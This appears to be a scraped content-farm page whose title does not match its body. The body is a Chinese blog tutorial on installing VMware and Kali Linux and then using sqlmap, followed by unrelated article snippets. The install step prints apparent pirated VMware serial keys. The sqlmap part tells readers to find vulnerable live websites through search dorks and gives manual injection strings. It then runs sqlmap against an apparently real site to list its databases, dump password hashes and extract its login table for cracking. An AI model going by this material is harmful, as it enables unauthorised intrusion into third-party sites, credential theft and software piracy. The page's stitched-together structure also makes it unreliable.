肥宅钓鱼网
当前位置: 首页 钓鱼百科

win10自带虚拟机安装kali报错(网络安全.虚拟机VMware)

时间:2023-08-04 作者: 小编 阅读量: 1 栏目名: 钓鱼百科

Sqlmap是一款非常强大的开源渗透测试工具,用于自动检测和利用SQL注入漏洞控制数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,通过外部连接访问数据库底层文件系统和操作系统,并执行命令实现渗透。通过人为猜解,知道登录表位usr。

一.虚拟机安装

1.首先需要下载VMware虚拟机,并对其进行安装。下载地址:https://www.vmware.com/cn.html

2.选择合适的版本进行下载,作者这里安装的版本为“VMware-workstation-full-12.5.2-4638234.ext”,并且上传至百度云分享给大家。

3.双击EXE文件,开始进行安装。

4.安装完成之后输入序列号激活。

5A02H-AU243-TZJ49-GTC7K-3C61N VF5XA-FNDDJ-085GZ-4NXZ9-N20E6UC5MR-8NE16-H81WY-R7QGV-QG2D8ZG1WH-ATY96-H80QP-X7PEX-Y30V4AA3E0-0VDE1-0893Z-KGZ59-QGAVF

5.运行VMware软件如下图所示,接下来需要进行第二部分的Kali配置。

二.创建虚拟机并载入Kali Linux

1.去Kali官网Downloads页面下载64位Kali Linux的torrent文件,再通过迅雷下载。下载地址:https://www.kali.org/downloads/,作者百度云网盘已上传。

2.下载成功后,新建虚拟机,选择“自定义”设置。

3.导入下载好的Kali Linux镜像文件,选择操作系统为Linux。

4.输入虚拟机的名称和安装位置。

5.设置内存分配大小,建议不要超过提示的最大内存推荐。

6.接着点击下一步,包括。

7.选择磁盘容量大小,建议比分配容量大些,并设为。

8.创建完成之后,如下图所示。

三.安装Kali Linux

1.开启虚拟机,进入安装界面,如下图所示,点击“开启此虚拟机”。

2.选择安装方式为“Graphical install”。

3.选择语言“中文简体”和地区“中国”,点击“继续”按钮安装。

4.自定义主机名,默认为“kali”,域名直接跳过即可。

5.设置用户密码,这是类似于Windows的开机密码,接着安装。

6.设置磁盘分区。

7.接着接续安装。

8.在询问是否要选择网络镜像时,如果你的网络很好可以选择是,这里我选择否。

下面这个GRUB安装至硬盘要选择“是”!

9.安装成功之后,等待系统重启即安装完成。

10.最终界面如下图所示。

Kali其他设置包括分辨率、中文输入、全屏显示等,请同学们自行百度学习。

四.Kali功能介绍

1.信息收集

2.漏洞分析

3.Web程序

4.数据库评估软件

5.密码攻击

6.无线攻击

7.逆向工程

8.漏洞利用工具集

9.嗅探/欺骗

10.权限维护

11.数字取证

12.报告工具集

13.Social Engineering Tools

打开某个软件,如下图所示。

五.SQLmap基本用法

下面作者结合Sqlmap简单讲述一个Kali环境中的实战案例。

Web漏洞包括网站本身漏洞、软件漏洞、服务器漏洞、外部攻击等,其拿站的基本方法包括通用型、SQL注入、DDoS、XXS跨站、越权漏洞、旁站注入、CSRF跨站请求、上传漏洞、支付漏洞等。

Sqlmap 是一款非常强大的开源渗透测试工具,用于自动检测和利用SQL注入漏洞控制数据库服务器的过程。它配备了一个强大的检测引擎,由Python语言开发完成,通过外部连接访问数据库底层文件系统和操作系统,并执行命令实现渗透。

Sqlmap的基本流程如下:

找注入点并检测:sqlmap –u “链接”

列库显示数据库:sqlmap –u “链接” --dbs

列表显示表:sqlmap –u “链接” –D 数据库 --tables

列字段显示表中字段: sqlmap –u “链接” –D 数据库 –T 表名 --columns

爆内容显示字段内容:sqlmap –u “链接” –D 数据库 –T 表名 –C 字段 --dump

作者本来想以“实验吧”的CTF题目作为测试地址(http://ctf5.shiyanbar.com/8/index.php?id=1),但最近它维修中,无法访问;但使用“inurl:.asp?id=”未能搜索到目标网站。希望读者后续尝试“实验吧”的那个例子,或者自行搭建本地网站环境进行SQL注入学习。

第一步:寻找目标网站,通过浏览器“inurl:.asp?id=”搜索,寻找存在SQL注入漏洞的目标,可以先尝试手工注入判断。

判断注入点的方法很多,比如show.asp?code=115’ 加单引号,show.asp?code=115-1 减1,这里介绍一个经典的方法。

(1) http://xxxxx/show.asp?code=115’ and 1=1 – (正常显示)

对应的SQL语句:

select … from table where code=‘115’ and 1=1 – and xxxx;

单引号(’)匹配code='115,然后and连接,1=1恒成立,注释(–)掉后面语句。

(2) http://xxxxx/show.asp?code=115’ and 1=2 – (错误显示)

对应的SQL语句:

select … from table where code=‘115’ and 1=2 – and xxxx;

单引号(’)匹配code='115,然后and连接,1=2恒错误,注释(–)掉后面语句。

但很多网站都会有防火墙,防止SQL注入,如下图所示。

第二步:打开Kali环境中的Sqlmap环境,如下图所示。(后续采用之前的文章进行讲解,也希望读者自己尝试下)

第三步:获取所有数据库。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --dbs

运行结果如下图所示,获取9个数据库,其中–dbs参数表示databases。

第四步:获取当前数据库。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --current-db

运行结果如下图所示,获取9个数据库。其中–current-db参数表示当前数据库,相当于前文MSSQL的db_name()获取数据库字段。输出结果:akykd_new。

第五步:获取数据库当前用户。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --current-user

运行结果如下图所示,获取当前数据库用户sa。

第六步:获取数据库所有用户和密码。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" --passwords

运行结果如下图所示,获取数据库用户和密码。

第七步:获取数据库所有表。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new --tables

运行结果如下图所示,获取数据库ahykd_new的所有表,其中-D表示数据库,–tables表示所有表。通过人为猜解,知道登录表位usr。

第八步:获取数据库登录表所有字段。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new -T usr --columns

运行结果如下图所示,获取数据库ahykd_new的登录表usr所有字段,其中-D表示数据库,-T表示表,–columns表示usr表所有列。

是不是感觉到了SQLMAP的强大,其中用户名usr_name、密码passwd。

第九步:获取数据库登录表用户名和密码。

sqlmap.py -u "http://.../tztgxx.aspx?code=115" -D ahykd_new -T usr -C "usr_name,password" --dump

获取数据库ahykd_new的登录表usr所有字段,其中-D表示数据库,-T表示表,-C表示输出字段(usr_name、passwd),–dump输出所有值。

如果字段内容太多,可以设置输出个数,如10个用户名和密码。参数:-D ahykd_new -T usr -C “usr_name,passwd” --start 1 --stop 10 --dump

正常的输出结果例如下图所示,再通过md5解密即可。

六.总结

又忙了16个小时,发现自己网络安全方向的基础非常薄弱,有太多实践知识想学,太多学术论文想看,每天都在忙碌,过程非常艰辛,博士哪有这么好毕业。但是这种苦中带甜,充实的滋味又让我陶醉,还有远方的女神、许多朋友和博友的陪伴。希望未来在网络态势感知、恶意代码检测、嫌疑识别和知识图谱方面能再深入点,多读文献,多找创新,加油。

天行健,君子以自强不息。

地势坤,君子以厚德载物。

最后希望基础性文章对您有所帮助,作者也是这个领域的菜鸟一枚,希望与您共同进步,共勉。

    推荐阅读
  • 高中音乐教案设计(祖国的好河山寸土不让教案)

    为找到这批伤员,日伪军对沙家浜地区展开了疯狂的大扫荡。日寇并不甘心,命忠义救国军进驻沙家浜,设法找到这批伤员。忠义救国军司令胡传魁、参谋长刁德一向阿庆嫂打探伤员下落,阿庆嫂与敌人巧妙周旋,并引诱敌人开枪,利用枪声通知了芦苇荡的伤员,使伤员提高警惕。沙家浜被敌人长期占据,阿庆嫂按县委批示派沙四龙把伤员转移到红石村。

  • 电瓶放家里充电有危险吗(电瓶放家里充电有危害吗)

    以下内容大家不妨参考一二希望能帮到您!电瓶放家里充电有危险吗电瓶放家里充电有危险的。

  • 考研如何报名(考研的报名流程)

    报名时间一般在10月和11月,包括网上报名和现场确认。在校生报名时由学校统一报名。在职人员报名一般在地市一级教委的高招办或者报考的学校,也可以异地报名,即因为出差等原因在外地报名和参加考试。凡因信息填写错误或填报虚假信息而造成不能考试、复试或录取的,后果由考生本人承担。复试一般在3月下旬,过去一般是等额面试,现在基本上都已改成差额面试。

  • 喝皇菊花茶的好处 喝皇菊花茶的好处是什么

    对于上班一族来说,如果是经常面对电脑的,不妨多喝菊花茶,有利于抵抗电脑的辐射。

  • 吃蒜放屁多是怎么回事 吃蒜是不是放屁多

    大蒜中的特殊成分可使体内铅的浓度下降,能减少体内毒素。但是中医认为,长期大量地食用大蒜会“伤肝损眼”,且生吃大蒜对肠胃刺激较大,容易引起腹痛、腹泻、肠道充血等症状。大蒜的作用主要在于杀菌、提味、防癌抗癌等,但是过多食用,会对眼睛有伤害作用。大蒜中含有大蒜素,产生大量氢和二氧化碳、硫化氢等气体,所以会有放屁的现象。大蒜产生的大蒜油对你身体有好处。是大蒜分泌出的大蒜油对你胃肠的刺激的反映。

  • 艾灸风池的作用与好处 艾灸风池的好处与功效

    艾灸风池的作用风池足少阳胆经的穴位,位于头项交界之处,此处正好是进入头部的通道,因此此穴具有抵挡风邪入侵,清热解毒,疏通经络,益气的作用。缓解疼痛风池穴是头部要穴,具有抵御外邪及清热解毒的作用,而感冒头疼多由风邪入侵或湿热引起,因此,艾灸刺激风池可以达到缓解头痛的好处。风池穴的准确位置位于项部,当枕骨之下,与风府穴相平,胸锁乳突肌与斜方肌上端之间的凹陷处。

  • 梦见很多人吃饭是什么意思(梦见很多人吃饭解释)

    下面希望有你要的答案,我们一起来看看吧!梦见很多人吃饭是什么意思梦见很多人一起吃饭,表示金钱运上升。可以期待收入不断增加,口袋中绰绰有余。不过,要注意不可凭一时的冲动而买些没用的东西。梦见自己和家人或朋友围坐在一起吃饭,但气氛沉默又冷淡,则暗示你和家人、朋友有些隔膜,你觉得和他没有共同话语。

  • 魔兽世界新人升级攻略(新人简易起步攻略)

    优势,暗黑风,坦克一手群拉,对魔法伤害抵抗略有优势。邪DK大米爆发伤害天花板,但是一般打不出来,需要全队配合,另外PVP方面邪DK一枝独秀,有志PVP的新人可以考虑。团本大哥级别选手,伤害爆表,不罗嗦,团本鸟德,大米树,德鲁伊标准玩法。恢复,治疗专精,俗称树,大米唯一指定治疗职业,T0选手,天下无敌,压迫众生。。。戒律,团本治疗霸主,手法极难,不建议新人使用。

  • 夜尿一次量很大尿常规正常(一晚尿几次算正常)

    如果夜间排尿次数和尿液量多于白天,那么很有可能是患上了夜尿症。引起夜尿增多的原因主要有三点。夜尿增多不仅影响人体的正常作息,还有可能引发前列腺,糖尿病,肾功能不全,心力衰竭,高钙血,尿崩症等疾病,严重危害人体的健康。夜尿给人们的生活带来很多的不便,也严重影响身体的健康。当出现夜尿多的情况需要及时治疗,避免造成严重的后果。

  • 昕锐19款自动启停能关闭吗(关闭自动启停的方法)

    昕锐19款自动启停功能可以关闭使用时机:自动启停系统在钥匙通电的时候即默认自动开启,要关闭只需要按一下按钮就行,下面我们就来聊聊关于昕锐19款自动启停能关闭吗?接下来我们就一起去了解一下吧!昕锐19款自动启停能关闭吗昕锐19款自动启停功能可以关闭。自动启停系统在省油的同时,其舒适性会降低,起步的速度会比正常状态下慢半拍,起步瞬间多少也会有一些抖动。